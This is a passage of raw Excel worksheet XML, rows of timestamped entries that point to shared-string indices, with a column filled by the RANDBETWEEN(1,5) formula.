        <v>2</v>
      </c>
    </row>
    <row r="10922" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10922" s="1">
        <v>43327.173645833333</v>
      </c>
      <c r="C10922" t="s">
        <v>229</v>
      </c>
      <c r="E10922" s="2" t="s">
        <v>9768</v>
      </c>
      <c r="F10922">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10923" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10923" s="1">
        <v>43327.129305555558</v>
      </c>
      <c r="C10923" t="s">
        <v>17</v>
      </c>
      <c r="D10923" t="s">
        <v>112</v>
      </c>
      <c r="E10923" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10923">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10924" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A10924" s="1">
        <v>43327.119803240741</v>
      </c>
      <c r="C10924" t="s">
        <v>156</v>
      </c>
      <c r="D10924" t="s">
        <v>713</v>
      </c>
      <c r="E10924" s="2" t="s">
        <v>9769</v>
      </c>
      <c r="F10924">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10925" s="1">
        <v>43327.106168981481</v>
      </c>
      <c r="C10925" t="s">
        <v>140</v>
      </c>
      <c r="D10925" t="s">
        <v>46</v>
      </c>
      <c r="E10925" t="s">
        <v>9770</v>
      </c>
      <c r="F10925">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10926" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10926" s="1">
        <v>43327.089224537034</v>
      </c>
      <c r="C10926" t="s">
        <v>253</v>
      </c>
      <c r="D10926" t="s">
        <v>163</v>
      </c>
      <c r="E10926" s="2" t="s">
        <v>9771</v>
      </c>
      <c r="F10926">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10927" s="1">
        <v>43327.075833333336</v>
      </c>
      <c r="C10927" t="s">
        <v>17</v>
      </c>
      <c r="E10927" t="s">
        <v>9772</v>
      </c>
      <c r="F10927">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10928" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10928" s="1">
        <v>43327.055324074077</v>
      </c>
      <c r="C10928" t="s">
        <v>463</v>
      </c>
      <c r="D10928" t="s">
        <v>86</v>
      </c>
      <c r="E10928" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10928">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10929" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10929" s="1">
        <v>43326.986342592594</v>
      </c>
      <c r="C10929" t="s">
        <v>17</v>
      </c>
      <c r="D10929" t="s">
        <v>1993</v>
      </c>
      <c r="E10929" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10929">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10930" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A10930" s="1">
        <v>43326.951863425929</v>
      </c>
      <c r="C10930" t="s">
        <v>2210</v>
      </c>
      <c r="D10930" t="s">
        <v>336</v>
      </c>
      <c r="E10930" s="2" t="s">
        <v>9773</v>
      </c>
      <c r="F10930">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10931" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A10931" s="1">
        <v>43326.93509259259</v>
      </c>
      <c r="C10931" t="s">
        <v>410</v>
      </c>
      <c r="D10931" t="s">
        <v>312</v>
      </c>
      <c r="E10931" s="2" t="s">
        <v>9774</v>
      </c>
      <c r="F10931">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10932" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10932" s="1">
        <v>43326.924363425926</v>
      </c>
      <c r="C10932" t="s">
        <v>463</v>
      </c>
      <c r="D10932" t="s">
        <v>56</v>
      </c>
      <c r="E10932" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10932">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10933" s="1">
        <v>43326.868206018517</v>
      </c>
      <c r="C10933" t="s">
        <v>140</v>
      </c>
      <c r="D10933" t="s">
        <v>312</v>
      </c>
      <c r="E10933" t="s">
        <v>9775</v>
      </c>
      <c r="F10933">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10934" s="1">
        <v>43326.849479166667</v>
      </c>
      <c r="C10934" t="s">
        <v>6230</v>
      </c>
      <c r="D10934" t="s">
        <v>2214</v>
      </c>
      <c r="E10934" t="s">
        <v>9776</v>
      </c>
      <c r="F10934">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10935" s="1">
        <v>43326.818958333337</v>
      </c>
      <c r="C10935" t="s">
        <v>1501</v>
      </c>
      <c r="D10935" t="s">
        <v>89</v>
      </c>
      <c r="E10935" t="s">
        <v>9777</v>
      </c>
      <c r="F10935">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10936" s="1">
        <v>43326.815196759257</v>
      </c>
      <c r="C10936" t="s">
        <v>10</v>
      </c>
      <c r="D10936" t="s">
        <v>56</v>
      </c>
      <c r="E10936" t="s">
        <v>9778</v>
      </c>
      <c r="F10936">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10937" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10937" s="1">
        <v>43326.800486111111</v>
      </c>
      <c r="C10937" t="s">
        <v>48</v>
      </c>
      <c r="E10937" s="2" t="s">
        <v>9779</v>
      </c>
      <c r="F10937">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10938" s="1">
        <v>43326.76866898148</v>
      </c>
      <c r="C10938" t="s">
        <v>10</v>
      </c>
      <c r="D10938" t="s">
        <v>374</v>
      </c>
      <c r="E10938" t="s">
        <v>9780</v>
      </c>
      <c r="F10938">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10939" s="1">
        <v>43326.764768518522</v>
      </c>
      <c r="C10939" t="s">
        <v>454</v>
      </c>
      <c r="D10939" t="s">
        <v>602</v>
      </c>
      <c r="E10939" t="s">
        <v>9602</v>
      </c>
      <c r="F10939">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10940" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A10940" s="1">
        <v>43326.760972222219</v>
      </c>
      <c r="C10940" t="s">
        <v>103</v>
      </c>
      <c r="D10940" t="s">
        <v>667</v>
      </c>
      <c r="E10940" s="2" t="s">
        <v>9781</v>
      </c>
      <c r="F10940">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10941" s="1">
        <v>43326.755752314813</v>
      </c>
      <c r="C10941" t="s">
        <v>3106</v>
      </c>
      <c r="D10941" t="s">
        <v>222</v>
      </c>
      <c r="E10941" t="s">
        <v>9782</v>
      </c>
      <c r="F10941">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10942" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10942" s="1">
        <v>43326.747395833336</v>
      </c>
      <c r="C10942" t="s">
        <v>10</v>
      </c>
      <c r="D10942" t="s">
        <v>6</v>
      </c>
      <c r="E10942" s="2" t="s">
        <v>9783</v>
      </c>
      <c r="F10942">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10943" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10943" s="1">
        <v>43326.743437500001</v>
      </c>
      <c r="C10943" t="s">
        <v>10</v>
      </c>
      <c r="D10943" t="s">
        <v>6</v>
      </c>
      <c r="E10943" s="2" t="s">
        <v>9784</v>
      </c>
      <c r="F10943">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10944" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A10944" s="1">
        <v>43326.742488425924</v>
      </c>
      <c r="C10944" t="s">
        <v>10</v>
      </c>
      <c r="D10944" t="s">
        <v>158</v>
      </c>
      <c r="E10944" s="2" t="s">
        <v>9785</v>
      </c>
      <c r="F10944">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10945" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10945" s="1">
        <v>43326.740868055553</v>
      </c>
      <c r="C10945" t="s">
        <v>10</v>
      </c>
      <c r="D10945" t="s">
        <v>6</v>
      </c>
      <c r="E10945" s="2" t="s">
        <v>9786</v>
      </c>
      <c r="F10945">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10946" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10946" s="1">
        <v>43326.72997685185</v>
      </c>
      <c r="C10946" t="s">
        <v>10</v>
      </c>
      <c r="D10946" t="s">
        <v>6</v>
      </c>
      <c r="E10946" s="2" t="s">
        <v>9787</v>
      </c>
      <c r="F10946">
        <f t="shared" ref="F10946:F11009" ca="1" si="171">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="10947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10947" s="1">
        <v>43326.716273148151</v>
      </c>
      <c r="C10947" t="s">
        <v>559</v>
      </c>
      <c r="D10947" t="s">
        <v>39</v>
      </c>
      <c r="E10947" t="s">
        <v>9788</v>
      </c>
      <c r="F10947">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10948" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10948" s="1">
        <v>43326.685578703706</v>
      </c>
      <c r="C10948" t="s">
        <v>48</v>
      </c>
      <c r="E10948" s="2" t="s">
        <v>9789</v>
      </c>
      <c r="F10948">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10949" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10949" s="1">
        <v>43326.637314814812</v>
      </c>
      <c r="C10949" t="s">
        <v>156</v>
      </c>
      <c r="D10949" t="s">
        <v>381</v>
      </c>
      <c r="E10949" s="2" t="s">
        <v>9790</v>
      </c>
      <c r="F10949">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10950" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10950" s="1">
        <v>43326.63009259259</v>
      </c>
      <c r="C10950" t="s">
        <v>10</v>
      </c>
      <c r="D10950" t="s">
        <v>14</v>
      </c>
      <c r="E10950" s="2" t="s">
        <v>9791</v>
      </c>
      <c r="F10950">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10951" s="1">
        <v>43326.623726851853</v>
      </c>
      <c r="C10951" t="s">
        <v>6230</v>
      </c>
      <c r="D10951" t="s">
        <v>1036</v>
      </c>
      <c r="E10951" t="s">
        <v>9776</v>
      </c>
      <c r="F10951">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10952" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10952" s="1">
        <v>43326.608090277776</v>
      </c>
      <c r="C10952" t="s">
        <v>6</v>
      </c>
      <c r="D10952" t="s">
        <v>25</v>
      </c>
      <c r="E10952" t="s">
        <v>9792</v>
      </c>
      <c r="F10952">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10953" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A10953" s="1">
        <v>43326.590636574074</v>
      </c>
      <c r="C10953" t="s">
        <v>10</v>
      </c>
      <c r="D10953" t="s">
        <v>6</v>
      </c>
      <c r="E10953" s="2" t="s">
        <v>9793</v>
      </c>
      <c r="F10953">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10954" s="1">
        <v>43326.587592592594</v>
      </c>
      <c r="C10954" t="s">
        <v>10</v>
      </c>
      <c r="D10954" t="s">
        <v>494</v>
      </c>
      <c r="E10954" t="s">
        <v>9794</v>
      </c>
      <c r="F10954">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10955" s="1">
        <v>43326.587268518517</v>
      </c>
      <c r="C10955" t="s">
        <v>10</v>
      </c>
      <c r="D10955" t="s">
        <v>80</v>
      </c>
      <c r="E10955" t="s">
        <v>9795</v>
      </c>
      <c r="F10955">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10956" s="1">
        <v>43326.559918981482</v>
      </c>
      <c r="C10956" t="s">
        <v>10</v>
      </c>
      <c r="D10956" t="s">
        <v>23</v>
      </c>
      <c r="E10956" t="s">
        <v>9796</v>
      </c>
      <c r="F10956">
        <f t="shared" ca="1" si="171"/>
        <v>4</v>
      </c>
    </row>
    <row r="10957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10957" s="1">
        <v>43326.514594907407</v>
      </c>
      <c r="C10957" t="s">
        <v>10</v>
      </c>
      <c r="D10957" t="s">
        <v>6</v>
      </c>
      <c r="E10957" t="s">
        <v>9797</v>
      </c>
      <c r="F10957">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10958" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10958" s="1">
        <v>43326.503900462965</v>
      </c>
      <c r="C10958" t="s">
        <v>48</v>
      </c>
      <c r="E10958" t="s">
        <v>9798</v>
      </c>
      <c r="F10958">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10959" s="1">
        <v>43326.503425925926</v>
      </c>
      <c r="C10959" t="s">
        <v>48</v>
      </c>
      <c r="E10959" t="s">
        <v>9798</v>
      </c>
      <c r="F10959">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10960" s="1">
        <v>43326.494976851849</v>
      </c>
      <c r="C10960" t="s">
        <v>10</v>
      </c>
      <c r="D10960" t="s">
        <v>89</v>
      </c>
      <c r="E10960" t="s">
        <v>9799</v>
      </c>
      <c r="F10960">
        <f t="shared" ca="1" si="171"/>
        <v>4</v>
      </c>
    </row>
    <row r="10961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10961" s="1">
        <v>43326.494803240741</v>
      </c>
      <c r="C10961" t="s">
        <v>10</v>
      </c>
      <c r="D10961" t="s">
        <v>20</v>
      </c>
      <c r="E10961" t="s">
        <v>9800</v>
      </c>
      <c r="F10961">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10962" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10962" s="1">
        <v>43326.492881944447</v>
      </c>
      <c r="C10962" t="s">
        <v>173</v>
      </c>
      <c r="E10962" s="2" t="s">
        <v>9801</v>
      </c>
      <c r="F10962">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10963" s="1">
        <v>43326.490358796298</v>
      </c>
      <c r="C10963" t="s">
        <v>10</v>
      </c>
      <c r="D10963" t="s">
        <v>80</v>
      </c>
      <c r="E10963" t="s">
        <v>9802</v>
      </c>
      <c r="F10963">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
      </c>
    </row>
    <row r="10964" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10964" s="1">
        <v>43326.470243055555</v>
      </c>
      <c r="C10964" t="s">
        <v>10</v>
      </c>
      <c r="D10964" t="s">
        <v>80</v>
      </c>
      <c r="E10964" t="s">
        <v>9803</v>
      </c>
      <c r="F10964">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10965" s="1">
        <v>43326.45</v>
      </c>
      <c r="C10965" t="s">
        <v>2104</v>
      </c>
      <c r="E10965" t="s">
        <v>9804</v>
      </c>
      <c r="F10965">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10966" s="1">
        <v>43326.444050925929</v>
      </c>
      <c r="C10966" t="s">
        <v>10</v>
      </c>
      <c r="D10966" t="s">
        <v>36</v>
      </c>
      <c r="E10966" t="s">
        <v>9805</v>
      </c>
      <c r="F10966">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10967" s="1">
        <v>43326.431909722225</v>
      </c>
      <c r="C10967" t="s">
        <v>10</v>
      </c>
      <c r="D10967" t="s">
        <v>36</v>
      </c>
      <c r="E10967" t="s">
        <v>9806</v>
      </c>
      <c r="F10967">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10968" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10968" s="1">
        <v>43326.430104166669</v>
      </c>
      <c r="C10968" t="s">
        <v>10</v>
      </c>
      <c r="D10968" t="s">
        <v>20</v>
      </c>
      <c r="E10968" s="2" t="s">
        <v>9807</v>
      </c>
      <c r="F10968">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10969" s="1">
        <v>43326.423611111109</v>
      </c>
      <c r="C10969" t="s">
        <v>10</v>
      </c>
      <c r="D10969" t="s">
        <v>36</v>
      </c>
      <c r="E10969" t="s">
        <v>9808</v>
      </c>
      <c r="F10969">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
      </c>
    </row>
    <row r="10970" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10970" s="1">
        <v>43326.421018518522</v>
      </c>
      <c r="C10970" t="s">
        <v>1189</v>
      </c>
      <c r="D10970" t="s">
        <v>721</v>
      </c>
      <c r="E10970" s="2" t="s">
        <v>9809</v>
      </c>
      <c r="F10970">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10971" s="1">
        <v>43326.401516203703</v>
      </c>
      <c r="C10971" t="s">
        <v>10</v>
      </c>
      <c r="D10971" t="s">
        <v>17</v>
      </c>
      <c r="E10971" t="s">
        <v>9810</v>
      </c>
      <c r="F10971">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
      </c>
    </row>
    <row r="10972" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10972" s="1">
        <v>43326.396793981483</v>
      </c>
      <c r="C10972" t="s">
        <v>29</v>
      </c>
      <c r="D10972" t="s">
        <v>817</v>
      </c>
      <c r="E10972" s="2" t="s">
        <v>5768</v>
      </c>
      <c r="F10972">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
      </c>
    </row>
    <row r="10973" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10973" s="1">
        <v>43326.376562500001</v>
      </c>
      <c r="C10973" t="s">
        <v>140</v>
      </c>
      <c r="D10973" t="s">
        <v>141</v>
      </c>
      <c r="E10973" t="s">
        <v>9811</v>
      </c>
      <c r="F10973">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10974" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10974" s="1">
        <v>43326.338912037034</v>
      </c>
      <c r="C10974" t="s">
        <v>4276</v>
      </c>
      <c r="D10974" t="s">
        <v>114</v>
      </c>
      <c r="E10974" s="2" t="s">
        <v>9812</v>
      </c>
      <c r="F10974">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10975" s="1">
        <v>43326.326608796298</v>
      </c>
      <c r="C10975" t="s">
        <v>41</v>
      </c>
      <c r="E10975" t="s">
        <v>9813</v>
      </c>
      <c r="F10975">
        <f t="shared" ca="1" si="171"/>
        <v>4</v>
      </c>
    </row>
    <row r="10976" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10976" s="1">
        <v>43326.321979166663</v>
      </c>
      <c r="C10976" t="s">
        <v>461</v>
      </c>
      <c r="E10976" s="2" t="s">
        <v>9814</v>
      </c>
      <c r="F10976">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10977" s="1">
        <v>43326.3125</v>
      </c>
      <c r="C10977" t="s">
        <v>43</v>
      </c>
      <c r="E10977" t="s">
        <v>9815</v>
      </c>
      <c r="F10977">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10978" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10978" s="1">
        <v>43326.268912037034</v>
      </c>
      <c r="C10978" t="s">
        <v>41</v>
      </c>
      <c r="E10978" s="2" t="s">
        <v>9816</v>
      </c>
      <c r="F10978">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
      </c>
    </row>
    <row r="10979" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10979" s="1">
        <v>43326.258946759262</v>
      </c>
      <c r="C10979" t="s">
        <v>9575</v>
      </c>
      <c r="D10979" t="s">
        <v>667</v>
      </c>
      <c r="E10979" s="2" t="s">
        <v>9817</v>
      </c>
      <c r="F10979">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10980" s="1">
        <v>43326.245636574073</v>
      </c>
      <c r="C10980" t="s">
        <v>10</v>
      </c>
      <c r="D10980" t="s">
        <v>817</v>
      </c>
      <c r="E10980">
        <v>6016066597</v>
      </c>
      <c r="F10980">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10981" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10981" s="1">
        <v>43326.240405092591</v>
      </c>
      <c r="C10981" t="s">
        <v>2210</v>
      </c>
      <c r="D10981" t="s">
        <v>290</v>
      </c>
      <c r="E10981" s="2" t="s">
        <v>9818</v>
      </c>
      <c r="F10981">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10982" s="1">
        <v>43326.233738425923</v>
      </c>
      <c r="C10982" t="s">
        <v>48</v>
      </c>
      <c r="E10982" t="s">
        <v>9819</v>
      </c>
      <c r="F10982">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10983" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10983" s="1">
        <v>43326.233287037037</v>
      </c>
      <c r="C10983" t="s">
        <v>71</v>
      </c>
      <c r="E10983" s="2" t="s">
        <v>9820</v>
      </c>
      <c r="F10983">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10984" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A10984" s="1">
        <v>43326.23238425926</v>
      </c>
      <c r="C10984" t="s">
        <v>103</v>
      </c>
      <c r="D10984" t="s">
        <v>381</v>
      </c>
      <c r="E10984" s="2" t="s">
        <v>9821</v>
      </c>
      <c r="F10984">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10985" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10985" s="1">
        <v>43326.230243055557</v>
      </c>
      <c r="C10985" t="s">
        <v>535</v>
      </c>
      <c r="E10985" s="2" t="s">
        <v>9822</v>
      </c>
      <c r="F10985">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
      </c>
    </row>
    <row r="10986" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10986" s="1">
        <v>43326.183576388888</v>
      </c>
      <c r="C10986" t="s">
        <v>4276</v>
      </c>
      <c r="D10986" t="s">
        <v>336</v>
      </c>
      <c r="E10986" s="2" t="s">
        <v>9823</v>
      </c>
      <c r="F10986">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10987" s="1">
        <v>43326.177291666667</v>
      </c>
      <c r="C10987" t="s">
        <v>559</v>
      </c>
      <c r="D10987" t="s">
        <v>17</v>
      </c>
      <c r="E10987" t="s">
        <v>9824</v>
      </c>
      <c r="F10987">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10988" s="1">
        <v>43326.172754629632</v>
      </c>
      <c r="C10988" t="s">
        <v>2210</v>
      </c>
      <c r="D10988" t="s">
        <v>312</v>
      </c>
      <c r="E10988" t="s">
        <v>9825</v>
      </c>
      <c r="F10988">
        <f t="shared" ca="1" si="171"/>
        <v>4</v>
      </c>
    </row>
    <row r="10989" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10989" s="1">
        <v>43326.113900462966</v>
      </c>
      <c r="C10989" t="s">
        <v>318</v>
      </c>
      <c r="E10989" s="2" t="s">
        <v>9826</v>
      </c>
      <c r="F10989">
        <f t="shared" ca="1" si="171"/>
        <v>4</v>
      </c>
    </row>
    <row r="10990" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10990" s="1">
        <v>43326.111446759256</v>
      </c>
      <c r="C10990" t="s">
        <v>2155</v>
      </c>
      <c r="D10990" t="s">
        <v>80</v>
      </c>
      <c r="E10990" s="2" t="s">
        <v>9827</v>
      </c>
      <c r="F10990">
        <f t="shared" ca="1" si="171"/>
        <v>4</v>
      </c>
    </row>
    <row r="10991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10991" s="1">
        <v>43326.086215277777</v>
      </c>
      <c r="C10991" t="s">
        <v>6230</v>
      </c>
      <c r="D10991" t="s">
        <v>94</v>
      </c>
      <c r="E10991" t="s">
        <v>9776</v>
      </c>
      <c r="F10991">
        <f t="shared" ca="1" si="171"/>
        <v>3</v>
      </c>
    </row>
    <row r="10992" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10992" s="1">
        <v>43326.040567129632</v>
      </c>
      <c r="C10992" t="s">
        <v>2104</v>
      </c>
      <c r="D10992" t="s">
        <v>192</v>
      </c>
      <c r="E10992" s="2" t="s">
        <v>9828</v>
      </c>
      <c r="F10992">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
      </c>
    </row>
    <row r="10993" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10993" s="1">
        <v>43325.976863425924</v>
      </c>
      <c r="C10993" t="s">
        <v>140</v>
      </c>
      <c r="D10993" t="s">
        <v>197</v>
      </c>
      <c r="E10993" s="2" t="s">
        <v>9829</v>
      </c>
      <c r="F10993">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
      </c>
    </row>
    <row r="10994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10994" s="1">
        <v>43325.975972222222</v>
      </c>
      <c r="C10994" t="s">
        <v>139</v>
      </c>
      <c r="E10994" t="s">
        <v>9830</v>
      </c>
      <c r="F10994">
        <f t="shared" ca="1" si="171"/>
        <v>2</v>
      </c>
    </row>
    <row r="10995" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10995" s="1">
        <v>43325.97078703704</v>
      </c>
      <c r="C10995" t="s">
        <v>729</v>
      </c>
      <c r="D10995" t="s">
        <v>46</v>
      </c>
      <c r="E10995" s="2" t="s">
        <v>9831</v>
      </c>
      <c r="F10995">
        <f t="shared" ca="1" si="171"/>
        <v>4</v>
      </c>
    </row>
    <row r="10996" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10996" s="1">
        <v>43325.918692129628</v>
      </c>
      <c r="C10996" t="s">
        <v>408</v>
      </c>
      <c r="E10996" s="2" t="s">
        <v>9832</v>
      </c>
      <c r="F10996">
        <f t="shared" ca="1" si="171"/>
        <v>1</v>
      </c>
    </row>
    <row r="10997" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10997" s="1">
        <v>43325.907118055555</v>
      </c>
      <c r="C10997" t="s">
        <v>253</v>
      </c>
      <c r="E10997" s="2" t="s">
        <v>9833</v>
      </c>
      <c r="F10997">
        <f t="shared" ca="1" si="171"/>
        <v>5</v>
